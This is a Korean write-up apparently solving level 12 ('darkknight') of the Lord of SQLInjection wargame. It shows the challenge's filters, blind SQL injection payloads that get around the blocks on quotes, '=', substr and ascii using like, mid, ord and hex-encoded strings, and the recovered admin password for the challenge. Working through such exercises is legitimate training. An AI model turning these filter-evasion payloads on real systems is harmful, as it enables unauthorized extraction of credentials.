[LOS] Darkknight 풀이(12)

12번째 문제인 "darkknight"를 보시면 preg_match 함수를 사용한 다양한 필터링 검증이 추가된 것을 확인할 수 있습니다.

 

if(preg_match('/prob|_|\.|\(\)/i', $_GET [no])) exit("No Hack ~_~"); 
if(preg_match('/\'/i', $_GET[pw])) exit("HeHe"); 
if(preg_match('/\'|substr|ascii|=/i', $_GET [no])) exit("HeHe");

비교 연산자인 or 나 and 는 검증을 하지 않고 있지만 전 단계들과 다르게 싱글 쿼터( ' )를 차단하고 있기 때문에 " 싱글 쿼터 "를 대신할 방법을 찾아야 할 것 같습니다.

 

필터링 우회

= --> like 또는 between을 사용
substr --> right, left, mid 등 을 사용
'(싱글 쿼터) --> " 더블 쿼터 사용
ascii --> ord 사용

left : 문자에 왼쪽을 기준으로 일정 갯수를 가져오는 함수
mid : 문자에 지정한 시자 위치를 기준으로 일정 갯수를 가져오는 함수
right : 문자에 오른쪽을 기준으로 갯수를 가져온느 함수
ord : 아스키 코드 값을 반환하는 함수

 

$query = "select pw from prob_darkknight where id='admin' and pw='{$_GET [pw]}'"; 
if(($result ['pw']) && ($result['pw'] == $_GET ['pw'])) solve("darkknight"); 

문제를 해결하기 위해선 " admin " 계정의 패스워드를 pw 변수 안에 최종적으로 입력해서 해결해야 되는 문제인 것 같습니다. 또한 입력된 패스워드가 DB내의 패스워드가 동일해야 되기 때문에 정확한 값을 BSQLI로 알아내야 될 것 같습니다.

 

Input Code ( =, ' 우회)

1 or id like "admin" %26%26 length(pw) like 8
1 or id like 0x61646d696e %26%26 length(pw) like 8

 

위의 구문을 통해 admin 계정의 패스워드가 8자리 인 것을 확인할 수 있습니다.만일 해당 문제에서 "(더블 쿼터)까지 차단을 하고 있다면 admin 키워드를 " hex " 코드로 돌려서 사용하면 우회가 가능합니다.

 

Input Code ( =, ', ascii, substr 우회 )

1 or id like "admin" %26%26 ord(mid(pw,1,1)) like 48%23
1 or id like 0x61646d696e %26%26 ord(mid(pw,1,1)) like 48%23

 

해당 $1$ 영역은 패스워드의 자릿수를 의미하며 해당 부분은 1 ~ 8자리까지 하나씩 추가할 것입니다.$47$ 부분은 추출한 패스워드와 비교할 ascii 코드이며 하단의 코드를 참고하여 비교

32 ~ 47 : 특수문자 (space, !, ", #, $, %, & 등)
58 ~ 64 : 특수문자 (:, ;, <, =, >, ?, @)
123 ~ 126 : 특수문자 ({, |, }, ~)
48 ~ 57 : 숫자 (0 ~ 9)
65 ~ 90 : 영어(대문자) (A ~ Z)
97 ~ 122  : 영어(소문자) (a ~ z)

 

 

도출된 ASCII 값 복구

48 --> 0
98 --> b
55 --> 7
48 --> 0

101 --> e
97 --> a
49 --> 1

102 --> f

 

버프 슈트를 통해 도출된 ascii 코드를 숫자, 문자로 변환해보면 " 0b70ea1f "라는 패스워드가 나오며 해당 값을" pw " 변수에 넣어주기면 하면 클리어가 됩니다.